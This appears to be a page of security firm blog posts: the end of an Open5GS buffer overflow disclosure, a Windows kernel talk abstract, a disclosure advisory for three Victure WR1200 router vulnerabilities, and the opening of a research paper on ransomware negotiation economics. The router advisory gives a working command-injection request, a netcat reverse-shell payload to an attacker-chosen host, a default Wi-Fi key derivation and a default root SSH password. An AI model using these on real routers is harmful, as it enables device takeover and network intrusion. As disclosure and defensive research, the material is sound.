Although reading beyond the length of the ‘src’ variable requires a coding error in the calling function, the one-byte buffer overflow can be triggered by data passed in by an attacker.

  • 01/11/2021 – Notified Open5GS of issues (read beyond ‘src‘ variable and one byte overflow to ‘dst‘ variable)
  • 06/11/2021 – Requested example packet to cause one byte overflow
  • 09/11/2021 – Sent example python script and screenshot to demonstrate one byte overflow
  • 15/11/2021 – Open5GS main branch patched

This will be fixed in Open5GS versions released after 2.3.6. However, the solution of extending the buffers by one byte is not an ideal fix.

We hope this blog post has given you a high level technical insight into the dangers of a simple buffer overflow bug, and how it can potentially be exploited by an attacker!

Glossary

ASLR – Address Space Layout Randomization
UPF – User Plane Function
Fuzzer – Software that generates invalid input for testing applications
Stack – Area of memory used to store function call data
MME – Mobility Management Entity

References

[1] GitHub – open5gs/open5gs: Open5GS is an Open Source implementation for 5G Core and EPC

[2] 64-IA-32 Architectures Software Developer Instruction Set Reference Manual

How to work with us on Commercial Telecommunications Security Testing

NCC Group has performed cybersecurity audits of telecommunications equipment for both small and large enterprises. We have experts in the telecommunications field and work with worldwide operators and vendors on securing their networks. NCC Group regularly undertakes assessments of 3G/4G/5G networks, as well as providing detailed threat assessments for clients. Our consultant base can look in detail at the security threats to your extended enterprise equipment, a mobile messaging platform, or a vendor’s hardware. We work closely with all vendors and have extensive knowledge of each major vendor’s equipment.

NCC Group is at the forefront of 5G security working with network equipment manufacturers and operators alike. We have the skills and capability to secure your mobile network and provide unique insights into vulnerabilities and exploit vectors used by various attackers. Most recently, we placed first in the 5G Cyber Security Hack 2021 Ericsson challenge in Finland.

NCC Group can offer proactive advice, security assurance, incident response services and consultancy services to help meet your security needs.

If you are an existing customer, please contact your account manager, otherwise please get in touch with our sales team.


POC2021 – Pwning the Windows 10 Kernel with NTFS and WNF Slides

By: Alex Plaskett

Alex Plaskett presented “Pwning the Windows 10 Kernel with NTFS and WNF” at Power Of Community (POC) on the 11th of November 2021.

The abstract of the talk is as follows:

A local privilege escalation vulnerability (CVE-2021-31956) 0day was identified as being exploited in the wild by Kaspersky. At the time it affected a broad range of Windows versions (right up to the latest and greatest of Windows 10).
With no access to the exploit or details of how it worked, other than a vulnerability summary, the following plan was enacted:

  1. Understand how exploitable the issue was in the presence of features such as the Windows 10 Kernel Heap-Backed Pool (Segment Heap).
  2. Determine how the Windows Notification Framework (WNF) could be used to enable novel exploit primitives.
  3. Understand the challenges an attacker faces with modern kernel pool exploitation and what factors are in play to reduce reliability and hinder exploitation.
  4. Gain insight from this exploit which could be used to enable detection and response by defenders.

The talk covers the above key areas and provides a detailed walkthrough, moving from an introduction to the subject all the way up to the knowledge needed for both offence and defence on modern Windows versions.

The slides for the talk can be downloaded as follows:


Technical Advisory – Multiple Vulnerabilities in Victure WR1200 WiFi Router (CVE-2021-43282, CVE-2021-43283, CVE-2021-43284)

By: Nicolas Bidron

Victure’s WR1200 WiFi router, also sometimes referred to as AC1200, was found to have multiple vulnerabilities exposing its owners to potential intrusion into their local WiFi network and complete takeover of the device.

Three vulnerabilities were uncovered, with links to the associated technical advisories below:

CVE-2021-43283 is a common Remote Code Execution vulnerability of a kind frequently found in routers implementing a ping/trace feature through their web interface that relies on a call to the ping or trace command of the underlying router OS.

However, the more interesting vulnerabilities here are the other two, which can easily be chained together to go from opportunistic sniffing of WiFi networks to full compromise of the router:

  • CVE-2021-43282 allows an attacker to easily guess the default WiFi WPA2 key (if it was not manually changed by the device owner), which in this case is derived from the last 4 bytes of the MAC address of the router. The MAC address is advertised by the access point and can be retrieved by a basic WiFi scan.
  • CVE-2021-43284 allows any user on the local network to open an SSH connection to the router with the default root:admin credentials; despite the user’s best efforts to change the default admin account password from the web interface, the password for the root account is not changed at the same time.

While NCC Group was able to get in contact with Victure’s support team and communicate these findings to them, the bugs were left unfixed. After giving Victure a reasonable amount of time to fix these findings in accordance with NCC’s responsible disclosure policies, it was decided to publicly release the following advisories. The disclosure timeline can be found at the bottom of this page.

Technical Advisories:

Default WiFi Network Password Advertised by Victure WR1200 WiFi router MAC address (CVE-2021-43282)

Vendor: Victure
Vendor URL: https://www.govicture.com
Versions affected: All versions up to and including 1.0.3
Systems Affected: WR1200
Author: Nicolas Bidron
CVE Identifier: CVE-2021-43282
Severity: High 8.1 (CVSS v3.1 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)

Summary

Victure’s WR1200 WiFi router is a general consumer WiFi router with an integrated web interface for configuration. It was found that the default password for the two WiFi networks is advertised to unauthenticated users within WiFi range.

Impact

The device’s default WiFi password for both the 2.4GHz and 5GHz networks can be trivially guessed by an attacker within range of the WiFi network, allowing the attacker to gain complete access to these networks if the password has been left unchanged from its factory default.

Details

The device’s default WiFi password corresponds to the last 4 bytes of the MAC address of its 2.4GHz network interface controller (NIC). An attacker within scanning range of the WiFi network can thus scan for WiFi networks with the following command.

$ iwlist wlp1s0 scanning | egrep "Victure" -B 5
          Cell 03 - Address: 38:01:46:FD:1C:C5
                    Channel:11
                    Frequency:2.462 GHz (Channel 11)
                    Quality=68/70  Signal level=-42 dBm  
                    Encryption key:on
                    ESSID:"Victure-1CC5"
--
          Cell 05 - Address: 38:01:46:FD:1C:C7
                    Channel:157
                    Frequency:5.785 GHz
                    Quality=49/70  Signal level=-61 dBm  
                    Encryption key:on
                    ESSID:"Victure-1CC5-5G"

The attacker can then effectively guess the correct default password from the last 4 bytes of the MAC address: 46:FD:1C:C5 -> password: 46fd1cc5.

Recommendation

  • Change the WPA key for both 2.4GHz and 5GHz WiFi networks through the router’s web interface

OS Command Injection in Victure WR1200 WiFi router (CVE-2021-43283)

Vendor: Victure
Vendor URL: https://www.govicture.com
Versions affected: All versions up to and including 1.0.3
Systems Affected: WR1200
Author: Nicolas Bidron
CVE Identifier: CVE-2021-43283
Severity: Medium 6.8 (CVSS v3.1 AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

Summary

Victure’s WR1200 WiFi router is a general consumer WiFi router with an integrated web interface for configuration. It was found that an attacker can inject shell commands through one of the forms on the web interface of the device.

Impact

A command injection vulnerability was found within the web interface of the device allowing an attacker with valid credentials to inject arbitrary shell commands to be executed by the device with root privileges. An attacker would thus be able to use this vulnerability to open a reverse shell on the device with root privileges.

Details

The “ping/traceroute” feature found under the Advanced/System Management portion of the web interface asks the user to enter an IP address, against which the device then performs a ping.  By appending a semicolon (;) to the domain field of the request, the attacker can successfully inject a command to be executed by the device.

e.g.:

request:

POST /cgi-bin/luci/;stok=REDACTED/admin/opsw/ping_tracert_apply HTTP/1.1
Host: 192.168.16.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 74
Origin: http://192.168.16.1
Connection: close
Referer: http://192.168.16.1/cgi-bin/luci/;stok=REDACTED/admin/opsw/advanced.html
Cookie: sysauth=REDACTED

{"type":"setmonitor","kind":"ping","domain":"127.0.0.1; echo vulnerable"}

response:

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Cache-Control: no-cache
Expires: 0
Content-Length: 25

{"result":0, "msg":"..."}

The attacker can then attempt retrieving the result of the last command executed by using the following request.

request:

GET /cgi-bin/luci/;stok=REDACTED/admin/opsw/ping_tracert HTTP/1.1
Host: 192.168.16.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.16.1/cgi-bin/luci/;stok=REDACTED/admin/opsw/advanced.html
Cookie: sysauth=REDACTED

response:

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Cache-Control: no-cache
Expires: 0
Content-Length: 45

{ "info": "vulnerable -c 4", "finish": 0 }

The following payload, fed into the domain field, can be used to open a reverse shell to any reachable host on the WAN or LAN network.

127.0.0.1 -c 1 ;rm /a;mkfifo /a;cat /tmp/a|/bin/sh -i 2>&1|nc X.X.X.X 1111 >/a;echo reverse_shell

Replace X.X.X.X in the above command with the IP address of a host waiting for an incoming connection. On the receiving host, apply an adequate firewall rule allowing incoming traffic on port 1111 and issue the following command to wait for the incoming connection from the router:

netcat -l -p 1111

Recommendation

This issue will remain exploitable to authenticated users as long as the Vendor doesn’t fix it through a new router firmware update.

Root SSH Access Enabled with Default Password on Victure WR1200 WiFi Router (CVE-2021-43284)

Vendor: Victure
Vendor URL: https://www.govicture.com
Versions affected: All versions up to and including 1.0.3
Systems Affected: WR1200
Author: Nicolas Bidron
CVE Identifier: CVE-2021-43284
Severity: High 8.8 (CVSS v3.1 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Summary

Victure’s WR1200 WiFi router is a general consumer WiFi router with an integrated web interface for configuration. It was found that the device offers SSH access on the local network, which for some accounts uses a default password that is not changeable through the web interface.

Impact

An attacker with access to the local network can gain access with elevated privileges on the device through SSH even in cases where the admin password was successfully updated through the web interface.

Details

The device allows SSH access from its local network (WiFi and ethernet) for two distinct users: admin and root. The admin’s SSH password matches the password set for the admin user on the web interface. The root’s SSH password never gets updated from its default value of “admin”. This leaves an attacker able to gain control of the device through SSH whether the admin password was changed on the web interface or not.

Recommendation

Ensure the admin’s default password is changed through the web interface. Also change the root account default password by logging in as root on the router through SSH in the following manner:

ssh root@<router IP>
>passwd

Disclosure Timeline:

January 26th 2021: Initial email from NCC to Victure announcing that vulnerabilities were found in one of their devices.

January 27th - February 2nd 2021: Multiple emails between Victure and NCC to agree on a secure method to deliver the vulnerability write-ups to Victure.

February 2nd 2021: Write-ups transmitted to Victure's representative through a verified WhatsApp chat session. Victure's representative then initiated a conversation between the software maintainer and NCC through Skype.

February 3rd 2021: The software maintainer on Skype acknowledged receipt of the bug write-ups.

October 12th 2021: NCC reached out to Victure again (not having heard from them since February 3rd 2021) to inform them of the intent to publicly disclose the bugs unless they could confirm a planned fix release within the next 30 days.

As of the publishing date of this Technical Advisory, no further communication from Victure has been received since February 3rd 2021.

Thanks to

Jennifer Fernick and Aaron Haymore for their support throughout the research and disclosure process.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  11/12/2021
Written by: Nicolas Bidron


“We wait, because we know you.” Inside the ransomware negotiation economics.

By: Aaron Haymore

Pepijn Hack, Cybersecurity Analyst, Fox-IT, part of NCC Group

Zong-Yu Wu, Threat Analyst, Fox-IT, part of NCC Group

Abstract

Organizations worldwide continue to face waves of digital extortion in the form of targeted ransomware. Digital extortion is now classified as the most prominent form of cybercrime and the most devastating and pervasive threat to functioning IT environments. Currently, research on targeted ransomware activity primarily looks at how these attacks are carried out from a technical perspective. However, little research has focused on the economics behind digital extortions and digital extortion negotiation strategies using empirical methods. This research paper explores three main topics. First, can we explain how adversaries use economic models to maximize their profits? Second, what does this tell us about the position of the victim during the negotiation phase? And third, what strategies can ransomware victims leverage to even the playing field? To answer these questions, over seven hundred attacker-victim negotiations, conducted between 2019 and 2020, were collected and bundled into a dataset. This dataset was subsequently analysed using both quantitative and qualitative methods. Analysis of the final ransom agreements reveals that adversaries already know how much victims will end up paying before the negotiations have even started. Each ransomware gang has created its own negotiation and pricing strategies meant to maximize its profits. We provide multiple (counter-)strategies which victims can use to obtain a more favourable outcome. These strategies are developed from negotiation failures and successes in the cases we have analysed, and are accompanied by examples and quotes from actual conversations between ransomware gangs and their victims. When a ransomware attack hits a company, it finds itself in the middle of an unknown situation. One thing that makes such a situation more manageable is having as much information as possible. We aim to provide victims with practical tips they can use when they find themselves in the middle of that crisis.

Introduction

It is 1:30 on a Saturday morning. You just went to bed exhausted after a week of demanding work, but your phone is ringing, nudging you to wake up. It is your IT department on the line telling you to come to the office right now. Your company got hacked and all of the important data is encrypted, including the backup storage. The head of your IT department informs you it is a kind of virus called ransomware. After two long hours of phone calls, you have assembled a crisis management team and you open the ransom note. It redirects you to a TOR website where you can chat with the adversaries who hacked your company. Their demand is 3.5 million US dollars in cryptocurrency. You get a sinking feeling in your stomach. You have spent years building this company from the ground up. You hired every employee yourself, and know every single one of them by name. You start to realise that the weekend away you planned with your wife and kids is going to have to be cancelled. You need to be there now for your company, and for all the families of the people that work for you. You open the chat and start typing. But after telling them you need more time to even start thinking about making a payment, all they respond with is – “We wait.”

After the adversary encrypts and exfiltrates the selected data, they set an initial ransom demand. If the victim decides to engage in negotiation, both sides will try to reach an agreement on the final amount. With this research we wanted to investigate the phenomenon of ransomware negotiations. How do adversaries set the price of their ransom demand? What is the final price adversaries would accept? How does the difference in information about each other impact the negotiation process? What does this tell us about paying or not paying the ransom? If companies do end up paying, are there strategies they can utilize to lower the ransom demand?

We made use of both quantitative and qualitative research methods to answer these research questions. There have been some earlier reports and blog posts from security companies and news agencies on this topic. However, this research is mainly based on empirical approaches. We have used our own data, gathered from more than seven hundred negotiations between threat actors and victims. Using this data, we provide information and practical tips to the victims who need them the most.

There is a negative sentiment in our society towards paying or negotiating with criminals, and the legitimacy and ethics of doing so are also questionable to say the least. Nonetheless, we realise that a significant percentage of companies currently do end up paying the ransom demand. Our research demonstrates that the adversaries have a significant upper hand in the negotiation process. They often know how much a victim would pay in the end, providing them a comfortable vantage point in the negotiations. We hope to achieve a twofold goal with our research: firstly, we discourage victims from engaging with the adversary. However, should there be no choice but to negotiate, the second half of our paper provides tips on how to do so successfully.

The paper is structured in two parts. The first half provides a short background on how ransomware-as-a-service developed and its economy, and goes on to model how adversaries are able to use price discrimination to maximize their profit. We then use our datasets to illustrate the information asymmetry between the victims of a ransomware attack and the attackers themselves. The second half digs deeper into the negotiation process, and provides practical tips and strategies that can be used during the negotiation phase, should it prove unavoidable. In the final paragraphs, we summarize our findings and explore how we should deal with the phenomenon of ransomware in the future, not only as individuals under attack, but as a society as a whole.

Background

The idea of cryptovirology, using cryptography to write malicious software, was initially born out of scientific curiosity in an academic research paper in 1996 [1]. More than a decade later, it was the actors behind GameOverZeus/ZeusP2P who brought the business into the wild under the name CryptoLocker in 2013 [2]. CryptoLocker implemented the same hybrid cryptographic system described in the cryptovirology paper to encrypt personal files and demand a ransom for the key to decrypt them. Consequently, the idea of abusing cryptography, which was originally intended to provide privacy, attracted attention from different cybercrime actors. For instance, in 2017, the WannaCry ransomware was able to self-propagate using the EternalBlue exploit and aimed to infect every vulnerable computer on the internet [3]. SamSam ransomware occupied the news headlines as it targeted the health-care sector in 2017 [4]. More recently, the arrival of Ransomware-as-a-Service (RaaS) has given different cybercrime actors easy access to ready-to-use ransomware. Along with the popularity of cryptocurrency, this led to a surge of targeted ransomware attacks worldwide. The ecosystem has since developed into a multiple-extortion attack: sensitive data is located, exfiltrated and encrypted. Ransomware extortions nowadays not only impose a denial-of-service attack on critical business resources, but also invade the privacy of their victims. Similarly, we have seen a rise in ransom demands. Previously people had to pay a couple of hundred dollars to get their holiday pictures back. Nowadays we see companies getting extorted for millions of dollars, and many of them end up paying these prices.

Data Collection

In this research, we primarily focused on two different ransomware strains. The first dataset was collected in 2019. This was a period when targeted ransomware attacks were upcoming and only a handful of groups were engaged in this business model. At that time, the adversaries were relatively inexperienced and ransom demands were lower compared to today’s amounts. The second dataset was collected in late 2020 and through the first couple of months of 2021. By this time, ransomware attacks had become a major threat to companies worldwide. Not only had the maturity of the operations improved, but there had also been an underground market shift towards targeting big and profitable enterprises. The owners of the second ransomware strain specifically positioned themselves in the market to only target such enterprises. The first dataset consists of 681 negotiations, and the second dataset consists of 30 negotiations between the victim and the ransomware group. Due to the sensitive nature of our data, we cannot share further details, as we have an obligation to protect our sources.

Ransomware Economics

As most adversaries have claimed, ransomware attacks are nothing but business. Ransomware groups try to achieve the highest possible profits; that is their primary motivation. In this section, we try to model the factors that drive the adversaries’ profit-making decisions. The model is somewhat rudimentary, but it can be used to explain key factors which impact the decision making of the adversaries as well as of their victims.

Hernandez-Castro et al. [5] explain their hypothesis in their paper “Economic Analysis of Ransomware” and used small-scale surveys to get some preliminary results. Our research builds on their model, which we have updated, and goes beyond it by testing our hypothesis on actual ransomware negotiation cases.

First and most importantly, the total profit is not only influenced by the amount of ransom demanded from the victim. It also depends on whether the victim decides to pay, and on the costs of the operation. Instead of studying a single ransom gain, the total profit throughout a series of attacks should be taken into consideration. Take two examples: an organised cybercrime group which only hunts for big targets and asks for millions of dollars, but where only 5% of the victims pay, compared with another group which only asks for ten thousand dollars but where 20% of the victims pay. Evidently, these two business strategies lead to different profit gains. Furthermore, the cost of running the criminal operation should be included in the calculation. We use the following formula to calculate the overall profit from the adversary’s perspective.

We describe P as the total profit taken by the criminal from N victims:

P = Σi=1..N ( ri × li × mi × f(i) − ci )

  • ri is the final ransom demand in case i.
  • li is the percentage left after exchanging the cryptocurrency to “clean” currencies.
  • mi is the percentage left after paying the commission fee for the RaaS platform. This fee depends on the rules of the RaaS platform and the total ransom, and can range from 10 to 30 percent of the ransom. In some cases this commission fee is 0, as some adversaries use in-house ransomware tool kits.
  • f(i) is the final decision made by the victim on whether to pay or not. f(i) can either be 0 or 1, with 0 meaning the victim decided not to pay and 1 meaning the victim did pay.
  • ci is the cost of carrying out the attack. A detailed explanation can be found in the following paragraphs.

Using this formula, we can calculate the adversaries’ profit for N victims. Let us assume we have two victims (N = 2). The ransom demand is $100,000 in bitcoin in both cases (ri), the exchange cost is 10% (li = 90%), the RaaS fee is 20% of the ransom (mi = 80%), only the second victim pays, and the cost of carrying out each attack is $50 (ci).

In the first case the profit is ($100,000 * 0.8 * 0.9) * 0 – $50 = -$50. In the second case the profit is ($100,000 * 0.8 * 0.9) * 1 – $50 = $71,950. The total profit of the ransom attack is $71,950 + (-$50) = $71,900.

In reality, each variable in the equation will be larger than in the example we have used. However, as you can tell, when an adversary is able to find a sweet spot where profit can be maximized, it can be an incredibly profitable business. On the other hand, if fewer and fewer victims decide to pay, or the ransoms paid are less than the adversaries expected, it becomes a challenge to keep their business running.

The variables affecting the cost of carrying out the attack (ci) can include:

  • Risk cost: These are the costs of avoiding being held accountable. It might include setting up proxies, hiding human factor evidence and even bribing local authorities.
  • Penetration cost: This is the cost of accessing the targets’ network. It might include, for example, hiring skilled hackers, buying access to malware/exploits/distribution services and any other form of illegal access into the targets’ network. If the adversary uses a home-brewed crypto locker, its cost should be included as well.

As for f(i), it is a function which models the decision to pay the ransom or not. Even though in the end it is a binary decision, either a yes or a no, the major variables affecting this decision include:

  • Ethics: There are certain companies who do not cooperate with the adversary whatsoever.
  • ri : The ransom amount strongly impacts the decision whether or not to pay.
  • Remediation cost: These are the costs of restoring backups, restarting any services, and compensating affected customers.
  • Regulation cost: This is the estimated cost of paying fines for the data breach (such as GDPR fines).

Maximise the Profit – Finding a Pricing Strategy from the Final Ransom Deal

In earlier years, groups behind ransomware strains used a uniform pricing strategy, meaning they asked a fixed price after each infection. For example, CryptoLocker demanded a payment of 400 USD or EUR per victim. However, the ecosystem has evolved into multiple-extortion schemes, each with its own price discrimination approach. There are three types of classic price discrimination [6]. First-degree price discrimination (personalized pricing) is perfect price discrimination, where each consumer is charged a different price based on their own willingness and ability to pay. Second-degree price discrimination is, for example, when the buyer gets a discount for bulk purchases. Third-degree price discrimination happens when the price depends on personal traits of the consumer, such as age or gender. In the case of a ransomware attack this could be the size of the company or the number of servers encrypted.

We have seen different actors adopting second- and third-degree price discrimination in ransom pricing. A Chinese cybercrime group asked a relatively high initial price for decrypting fewer than 10 locked computers, with the per-computer price sliding down once a bulk number of decryptors was sold. This is an example of second-degree price discrimination.

NUMBER OF COMPUTERS    PRICE/COMPUTER (IN USD)
1-9                    3,000
10-49                  1,500
50-99                  1,120
100-499                750
500-999                560
1000-4999              380
5000-9999              260
Table 1. The price table provided by the Chinese actors behind a ransomware attack.
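The tiered bulk discount in Table 1 can be expressed as a simple lookup. The sketch below is our own illustration of the second-degree pricing scheme, not the actors’ actual tooling; the function name and tier encoding are assumptions:

```python
# Per-computer price tiers from Table 1:
# (lower bound of each bracket, price per computer in USD)
TIERS = [
    (1, 3000), (10, 1500), (50, 1120), (100, 750),
    (500, 560), (1000, 380), (5000, 260),
]

def price_per_computer(n):
    """Return the per-computer decryptor price for n locked computers."""
    price = TIERS[0][1]
    for threshold, tier_price in TIERS:
        if n >= threshold:
            price = tier_price
    return price

# Decrypting 25 computers costs 25 * 1,500 = 37,500 USD in total,
# while a single computer costs 3,000 USD.
```

The larger the infection, the lower the unit price, which is exactly the bulk-purchase discount that characterises second-degree price discrimination.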

On the other hand, based on our data, the two groups we looked at were both part of multiple-extortion ransomware gangs, and both used third-degree price discrimination. In our dataset D-first, 17% (N = 116) of the 681 victims proceeded to pay the ransom, with an average amount of $400,767.05 per victim. Of the 116 victims who paid, we knew the revenue of 32 companies.

In the above example, the initial ransom price was set according to multiple variables. Finding out how the initial price is set and what it represents is important. However, this is beyond the scope of our research, because it is rather difficult to get access to decision-making processes that reside only within a criminal organisation. Thus, we focused on studying only the final ransom deal, which may tell a more accurate story about how the hidden price, or perhaps a baseline, is set.

A negotiation starts with the adversary demanding an initial ransom. The victim then has the option to ask for a lower price, or what adversaries call a ‘discount’. Both sides offer their ideal price back and forth. Intuitively, one would assume that the adversary does not know how much a victim is willing to pay. However, we used a metric, Ransom per annual Revenue (RoR), to demonstrate that the result can differ from what intuition suggests. This ratio tells us how much the victim paid per every million dollars in revenue. To calculate the RoR, we divided the ransom paid by the annual revenue (in million USD) the company made in the last year before it was attacked.
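As a sketch (the helper name is ours, chosen for illustration), the RoR values in Table 2 can be reproduced as follows:

```python
def ror(ransom_paid, revenue_millions):
    """Ransom per annual Revenue: USD paid per million USD of revenue."""
    return round(ransom_paid / revenue_millions)

# First row of Table 2: $36,270 paid on $100M annual revenue
ror(36_270, 100)   # 363
```

Applying this to each row of Table 2 reproduces the RoR column, e.g. the $405,068 ransom on $401M revenue gives an RoR of 1010.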

REVENUE (MILLION USD) RANSOM PAID ROR TYPE
$100 $36,270 363 MID
$151 $59,177 392 MID
$401 $405,068 1010 MID
$60 $63,867 1064 SMALL
$12 $12,788 1066 SMALL
$41 $57,274 1397 SMALL
$27 $39,300 1456 SMALL
$1,850 $3,126,549 1690 MID
$488 $1,015,554 2081 MID
$418 $957,906 2292 MID
$501 $1,229,124 2453 MID
$17 $48,191 2835 SMALL
$49 $158,798 3241 SMALL
$273 $1,049,651 3851 MID
$18 $80,297 4461 SMALL
$49 $290,483 5928 SMALL
$56 $385,141 6878 SMALL
$117 $918,027 7846 MID
$15 $118,871 7925 SMALL
$127 $1,055,674 8312 MID
$7 $66,917 9560 SMALL
$14 $161,614 11544 SMALL
$18 $216,162 12009 SMALL
$7 $87,422 12489 SMALL
$56 $728,014 13000 SMALL
$11 $147,628 13421 SMALL
$5 $68,308 13662 SMALL
$11 $156,541 14231 SMALL
$10 $151,038 15104 SMALL
$21 $371,562 17693 SMALL
$7 $368,576 52654 SMALL
$3 $234,770 78257 SMALL
Table 2. The Revenue, ransom and RoR calculated.
Figure 1. The box plot of RoR on all of the data in first dataset.

Interestingly, most of the final negotiated ransom prices fell into a certain margin, but there are also some outliers. We can further divide the victim companies into two categories based on their estimated revenue. D-first-small and D-first-mid represent small (revenue < 100 million USD per year) and medium size (revenue >= 100 million USD per year) companies, respectively.

Data Set       Revenue           Number  First Quartile  Median  Third Quartile
D-first-mid    >= 100 million $  10      1,000           2,200   3,900
D-first-small  < 100 million $   21      3,200           10,550  13,700
Figure 2. The box plot of RoR on the first dataset with two revenue groups separated. The left plot shows the victims who have more than 100 million in annual revenue and the right-hand side plot shows the victims who earned less than 100 million in annual revenue in the year before the company got compromised.

The results show that the adversaries operating behind the dataset we collected knew how much ransom a victim was willing to pay before the negotiation had started.

Another interesting observation is that smaller companies generally pay more from an RoR point of view. In other words, a smaller company pays less in absolute terms but more as a percentage of its revenue. This observation also holds in the second dataset.

Ransom Paid Estimated Revenue (in Million USD) RoR
$14,400,000 $17,500 822
$1,500,000 $1,000 1,500
$500,000 $1,000 500
$350,000 $16 21,875
Table 3. The RoR calculation on the second data set.

The highest ransom payment within the data set was $14.4 million. In this case, from the second dataset, the ransom was paid by a Fortune 500 company and amounted to only $822 per every million dollars in revenue, or 0.0822% of the annual revenue. The median RoR of the small enterprises of the first dataset corresponds to roughly 1.06% of revenue.
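Since RoR is expressed in dollars paid per million dollars of revenue, converting it to a percentage of annual revenue is a division by 10,000. A quick sketch (the helper name is our own):

```python
def ror_to_percent(ror):
    """Convert RoR (USD per million USD of revenue) to a percentage of revenue."""
    # $1 per $1,000,000 of revenue = 0.0001% of revenue
    return ror / 10_000

ror_to_percent(822)     # 0.0822 -> 0.0822% of annual revenue
ror_to_percent(10_550)  # 1.055  -> about 1.06% of annual revenue
```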

The duration of participating in criminal activities significantly affects the risk cost. It is therefore understandable that a financially motivated actor could cherry-pick valuable targets and profit from just a few big ransoms instead of attacking small companies. This has indeed led a few ransomware groups to target only big and profitable enterprises. In the second dataset (D-second), around 14% (N = 15) of 105 victims paid, with an average amount of $2,392,661 per victim. The owners of this second RaaS platform received less commission if the actor received a higher ransom. Therefore, there is an incentive for actors using the second RaaS platform to target high-profile companies.

Maximise the Profit – Discussion

We realise that there are limitations to this research. We cannot say for certain that the identified set of victims is representative of the entire population. Furthermore, based on our qualitative research we know that ransomware groups also use other factors to determine the price, such as the number of computers and servers that are encrypted, the number of employees, or the expected amount of media exposure a company will receive if people find out it got compromised. Unfortunately, these factors are not all publicly available and are therefore more difficult to compare. Although our dataset shows that the final ransom price correlates with the victim’s revenue, it cannot fully explain how adversaries set their ransom demands.

Despite these limitations, our findings suggest that adversaries have already adopted price discrimination strategies. It is obvious that the attackers are optimising their profit by trial and error in real infection cases. In addition, we have observed that some adversaries steal sensitive data and broadly look at financial statements from their victims. However, this pricing strategy, which is influenced by both successful negotiations and no-deal situations, is unknown to the victims. Normally, in a negotiation, each player holds their cards in their own hands. The ransomware actor knows the cost of their business and how much they need to make to break even. Meanwhile, the victim makes an estimation of the remediation cost. The ransom price is where the two counterparts meet in the middle. In the cybercrime world, however, this is not the case. The victim is playing the game for the first time, whereas the adversary has played many games and has settled on an optimal strategy. Furthermore, in sharp contrast to normal negotiations, the adversary can investigate the opponent’s cards if he chooses to do so. The result is a compromised victim trying to negotiate with an adversary who runs an unfair negotiation game, guiding the victim into a pre-set but seemingly reasonable ransom range without the victim’s knowledge. It is a rigged game. If the adversary plays well, he will always win. This ultimately contributes to a rampant ransomware ecosystem.

Do we negotiate with criminals?

Even though we have painted a bleak picture in our previous analysis, not all hope is lost. Despite their best efforts, the adversaries attacking companies are also just humans, and humans make mistakes or can be influenced into making certain decisions. In the next two sections we will explain what options are left once the decision to negotiate has been made.

Process-based tips before the negotiation starts

Although the focus of our research was the negotiation phase of a ransomware attack, we also want to provide some guidelines and tips on what to do before the negotiations start. We will not go into everything related to crisis management strategies, as there already is an abundance of training and information on the topic available online and in print. We will, however, touch upon some topics that we feel are not always covered in other sources, which we learned from reading the negotiations between ransomware groups and victims.

1.    Preparing employees

The first thing any company should teach their employees is not to open the ransom note and click on the link inside it. In the D-second database, and we have seen this with other adversaries as well, the timer starts counting when you click on the link. You can gain some valuable time by not doing this. Use this time to assess the impact of the ransomware infection. Address this in a structured manner by asking the following questions: Which parts of your infrastructure are hit? What consequences does this have for your day-to-day operations? How much money are we talking about? This will allow you to regain a degree of control over the situation and map out your future strategy.

2.    Think about your goals

Secondly, before you start negotiating, you should discuss your goal. What is it that you want to achieve? Is your technical department (perhaps with some outside help) able to restore the backups, meaning you only need to extend the timer, or are you going for a lower ransom? It is also important to decide what ransom demand would be your best- and worst-case scenario. You will only learn the actual demand when you click on the link, but you should at least estimate what you could pay before you open a conversation with the adversary.

3.    Communication lines

Another important thing to think about is setting up internal and external communication lines. Who is going to be responsible for what? A ransomware attack is not just an IT issue. Involve your crisis management team and your board to answer strategic questions. Involve legal counsel who can help answer questions about possible cyber insurance coverage and will know the rules and regulations regarding any institutions that need to be informed about data breaches. Also do not forget your communications department. It is becoming more common for adversaries to inform the media that they have hacked a company. This is done to put extra stress and pressure on the company’s decision making. Realising this beforehand and having a media strategy prepared will help you take control of the situation and mitigate possible damage.

4.    Inform yourself

Lastly, we advise getting informed about your attacker. Do some research yourself about their capabilities, or hire a specialised company with a threat intelligence department. They can tell you more about the peculiarities of the adversary you are dealing with. Perhaps they have a decryptor which is not available online, or know of another company that might be of help. They can also tell you more about the reliability of the adversary you are dealing with. Furthermore, knowing whether you should expect a DDoS attack, calls to your customers, or the leakage of information to the press is useful information to incorporate into your crisis management strategy.

Negotiation strategies

If the decision to pay the ransom is made, there are still ways to lessen the damage. Based on the analysis of more than 700 cases, we can give the following advice. Note that using just one of these strategies in your negotiation will not help much, but trying to implement as many of them as possible could save companies millions of dollars.

1.    Be respectful

This first tip might sound obvious, but crises can be emotional rollercoasters. Owners of companies can see their life’s work vanish in front of their eyes, like watching your house burn to the ground. We have seen multiple examples of companies getting frustrated and angry in conversations with threat actors, resulting in chats being closed. Look at the ransomware crisis as a business transaction. Hire outside help if needed, but stay professional. From the study of the D-first database we learned that there is a negative relation between being kind and the amount of ransom paid in the end. One example of someone who went above and beyond during a negotiation is the following. This person managed to talk the ransom down from 4 million to 1.5 million dollars.

